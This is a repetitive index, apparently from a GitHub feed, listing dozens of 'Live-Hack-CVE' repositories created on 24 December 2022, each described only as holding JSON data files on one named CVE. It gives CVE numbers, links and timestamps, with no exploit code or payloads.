**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3546 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3546](https://github.com/Live-Hack-CVE/CVE-2021-3546) create time: 2022-12-24T08:19:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3682 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3682](https://github.com/Live-Hack-CVE/CVE-2021-3682) create time: 2022-12-24T08:19:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3713 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3713](https://github.com/Live-Hack-CVE/CVE-2021-3713) create time: 2022-12-24T08:18:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1130 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1130](https://github.com/Live-Hack-CVE/CVE-2022-1130) create time: 2022-12-24T08:22:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2047](https://github.com/Live-Hack-CVE/CVE-2022-2047) create time: 2022-12-24T08:22:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39823 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39823](https://github.com/Live-Hack-CVE/CVE-2022-39823) create time: 2022-12-24T08:21:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2048 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2048](https://github.com/Live-Hack-CVE/CVE-2022-2048) create time: 2022-12-24T08:21:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37453 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37453](https://github.com/Live-Hack-CVE/CVE-2022-37453) create time: 2022-12-24T08:21:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3623 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3623](https://github.com/Live-Hack-CVE/CVE-2022-3623) create time: 2022-12-24T08:20:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31627 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31627](https://github.com/Live-Hack-CVE/CVE-2022-31627) create time: 2022-12-24T08:20:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20254 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20254](https://github.com/Live-Hack-CVE/CVE-2022-20254) create time: 2022-12-24T08:20:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32083 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32083](https://github.com/Live-Hack-CVE/CVE-2022-32083) create time: 2022-12-24T08:20:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32086 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32086](https://github.com/Live-Hack-CVE/CVE-2022-32086) create time: 2022-12-24T08:20:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20253 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20253](https://github.com/Live-Hack-CVE/CVE-2022-20253) create time: 2022-12-24T08:20:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30631](https://github.com/Live-Hack-CVE/CVE-2022-30631) create time: 2022-12-24T08:20:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30632](https://github.com/Live-Hack-CVE/CVE-2022-30632) create time: 2022-12-24T08:20:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30633 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30633](https://github.com/Live-Hack-CVE/CVE-2022-30633) create time: 2022-12-24T08:20:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22546 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22546](https://github.com/Live-Hack-CVE/CVE-2022-22546) create time: 2022-12-24T08:19:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22543 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22543](https://github.com/Live-Hack-CVE/CVE-2022-22543) create time: 2022-12-24T08:18:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22545](https://github.com/Live-Hack-CVE/CVE-2022-22545) create time: 2022-12-24T08:18:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22544](https://github.com/Live-Hack-CVE/CVE-2022-22544) create time: 2022-12-24T08:18:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24741 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24741](https://github.com/Live-Hack-CVE/CVE-2022-24741) create time: 2022-12-24T08:17:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24889 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24889](https://github.com/Live-Hack-CVE/CVE-2022-24889) create time: 2022-12-24T08:17:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24888](https://github.com/Live-Hack-CVE/CVE-2022-24888) create time: 2022-12-24T08:17:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38198](https://github.com/Live-Hack-CVE/CVE-2022-38198) create time: 2022-12-24T07:45:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39315 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39315](https://github.com/Live-Hack-CVE/CVE-2022-39315) create time: 2022-12-24T07:45:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39341 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39341](https://github.com/Live-Hack-CVE/CVE-2022-39341) create time: 2022-12-24T07:45:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39340 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39340](https://github.com/Live-Hack-CVE/CVE-2022-39340) create time: 2022-12-24T07:45:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39342 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39342](https://github.com/Live-Hack-CVE/CVE-2022-39342) create time: 2022-12-24T07:45:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39345 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39345](https://github.com/Live-Hack-CVE/CVE-2022-39345) create time: 2022-12-24T07:45:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26891](https://github.com/Live-Hack-CVE/CVE-2022-26891) create time: 2022-12-24T07:45:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3350 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3350](https://github.com/Live-Hack-CVE/CVE-2022-3350) create time: 2022-12-24T07:45:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3335 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3335](https://github.com/Live-Hack-CVE/CVE-2022-3335) create time: 2022-12-24T07:45:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8516](https://github.com/Live-Hack-CVE/CVE-2017-8516) create time: 2022-12-24T06:55:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22033](https://github.com/Live-Hack-CVE/CVE-2020-22033) create time: 2022-12-24T07:02:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22034](https://github.com/Live-Hack-CVE/CVE-2020-22034) create time: 2022-12-24T07:02:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20951 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20951](https://github.com/Live-Hack-CVE/CVE-2020-20951) create time: 2022-12-24T07:02:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18392 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18392](https://github.com/Live-Hack-CVE/CVE-2020-18392) create time: 2022-12-24T07:02:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19038 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19038](https://github.com/Live-Hack-CVE/CVE-2020-19038) create time: 2022-12-24T07:00:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19721 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19721](https://github.com/Live-Hack-CVE/CVE-2020-19721) create time: 2022-12-24T07:00:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20221](https://github.com/Live-Hack-CVE/CVE-2020-20221) create time: 2022-12-24T07:00:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21937 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21937](https://github.com/Live-Hack-CVE/CVE-2020-21937) create time: 2022-12-24T07:00:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19464 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19464](https://github.com/Live-Hack-CVE/CVE-2020-19464) create time: 2022-12-24T07:00:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19463](https://github.com/Live-Hack-CVE/CVE-2020-19463) create time: 2022-12-24T07:00:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19301 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19301](https://github.com/Live-Hack-CVE/CVE-2020-19301) create time: 2022-12-24T06:59:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18698](https://github.com/Live-Hack-CVE/CVE-2020-18698) create time: 2022-12-24T06:59:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18701 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18701](https://github.com/Live-Hack-CVE/CVE-2020-18701) create time: 2022-12-24T06:59:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22937 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22937](https://github.com/Live-Hack-CVE/CVE-2020-22937) create time: 2022-12-24T06:59:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18875](https://github.com/Live-Hack-CVE/CVE-2020-18875) create time: 2022-12-24T06:59:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22120](https://github.com/Live-Hack-CVE/CVE-2020-22120) create time: 2022-12-24T06:58:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18898 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18898](https://github.com/Live-Hack-CVE/CVE-2020-18898) create time: 2022-12-24T06:58:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19822 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19822](https://github.com/Live-Hack-CVE/CVE-2020-19822) create time: 2022-12-24T06:58:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19155 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19155](https://github.com/Live-Hack-CVE/CVE-2020-19155) create time: 2022-12-24T06:58:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21535 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21535](https://github.com/Live-Hack-CVE/CVE-2020-21535) create time: 2022-12-24T06:58:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22724 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22724](https://github.com/Live-Hack-CVE/CVE-2020-22724) create time: 2022-12-24T06:58:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15591](https://github.com/Live-Hack-CVE/CVE-2020-15591) create time: 2022-12-24T06:58:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23151 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23151](https://github.com/Live-Hack-CVE/CVE-2020-23151) create time: 2022-12-24T06:58:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23376 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23376](https://github.com/Live-Hack-CVE/CVE-2020-23376) create time: 2022-12-24T06:58:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23148 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23148](https://github.com/Live-Hack-CVE/CVE-2020-23148) create time: 2022-12-24T06:57:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23332 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23332](https://github.com/Live-Hack-CVE/CVE-2020-23332) create time: 2022-12-24T06:57:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23469 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23469](https://github.com/Live-Hack-CVE/CVE-2020-23469) create time: 2022-12-24T06:57:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23058 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23058](https://github.com/Live-Hack-CVE/CVE-2020-23058) create time: 2022-12-24T06:57:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23478 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23478](https://github.com/Live-Hack-CVE/CVE-2020-23478) create time: 2022-12-24T06:57:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23060 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23060](https://github.com/Live-Hack-CVE/CVE-2020-23060) create time: 2022-12-24T06:57:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43019 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43019](https://github.com/Live-Hack-CVE/CVE-2021-43019) create time: 2022-12-24T07:03:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21071 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21071](https://github.com/Live-Hack-CVE/CVE-2021-21071) create time: 2022-12-24T07:03:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21063 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21063](https://github.com/Live-Hack-CVE/CVE-2021-21063) create time: 2022-12-24T07:03:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33103 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33103](https://github.com/Live-Hack-CVE/CVE-2021-33103) create time: 2022-12-24T06:56:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0190 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0190](https://github.com/Live-Hack-CVE/CVE-2021-0190) create time: 2022-12-24T06:56:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33149 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33149](https://github.com/Live-Hack-CVE/CVE-2021-33149) create time: 2022-12-24T06:56:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33122](https://github.com/Live-Hack-CVE/CVE-2021-33122) create time: 2022-12-24T06:56:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33123 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33123](https://github.com/Live-Hack-CVE/CVE-2021-33123) create time: 2022-12-24T06:55:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33124 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33124](https://github.com/Live-Hack-CVE/CVE-2021-33124) create time: 2022-12-24T06:55:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33117 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33117](https://github.com/Live-Hack-CVE/CVE-2021-33117) create time: 2022-12-24T06:55:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25329 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25329](https://github.com/Live-Hack-CVE/CVE-2021-25329) create time: 2022-12-24T06:55:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33037 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33037](https://github.com/Live-Hack-CVE/CVE-2021-33037) create time: 2022-12-24T06:55:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30640 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30640](https://github.com/Live-Hack-CVE/CVE-2021-30640) create time: 2022-12-24T06:54:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30639 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30639](https://github.com/Live-Hack-CVE/CVE-2021-30639) create time: 2022-12-24T06:54:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42340 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42340](https://github.com/Live-Hack-CVE/CVE-2021-42340) create time: 2022-12-24T06:54:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3837 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3837](https://github.com/Live-Hack-CVE/CVE-2021-3837) create time: 2022-12-24T06:53:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38542 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38542](https://github.com/Live-Hack-CVE/CVE-2021-38542) create time: 2022-12-24T06:53:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37864](https://github.com/Live-Hack-CVE/CVE-2021-37864) create time: 2022-12-24T06:53:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36339 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36339](https://github.com/Live-Hack-CVE/CVE-2021-36339) create time: 2022-12-24T06:53:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33843](https://github.com/Live-Hack-CVE/CVE-2021-33843) create time: 2022-12-24T06:53:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3850 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3850](https://github.com/Live-Hack-CVE/CVE-2021-3850) create time: 2022-12-24T06:53:06Z

